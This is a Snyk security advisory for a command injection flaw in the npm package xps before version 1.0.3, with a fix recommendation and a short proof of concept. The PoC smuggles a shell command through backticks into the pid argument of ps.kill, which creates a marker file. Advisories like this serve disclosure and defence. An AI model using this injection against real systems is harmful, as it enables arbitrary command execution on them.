Command Injection Affecting xps package, versions <1.0.3
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-XPS-590098
- published 24 Jul 2020
- disclosed 23 Jul 2020
- credit d3lla
How to fix?
Upgrade xps
to version 1.0.3 or higher.
Overview
xps is a cross-platform library for listing and killing processes.
Affected versions of this package are vulnerable to Command Injection. The argument pid
is used to build the command that is passed to the child_process.exec
function without any sanitization.
PoC by Alessio (d3lla)
create a directory for testing
mkdir poc cd poc/
install latest vulnerable xps module (v1.0.2):
npm i xps@1.0.2
create the following PoC JavaScript file (
poc.js
):const ps = require('xps'); ps.kill('`touch HACKED;`').fork();
make sure that the HACKED file does not exist:
ls
execute the
poc.js
file:node poc.js
the HACKED file is created:
ls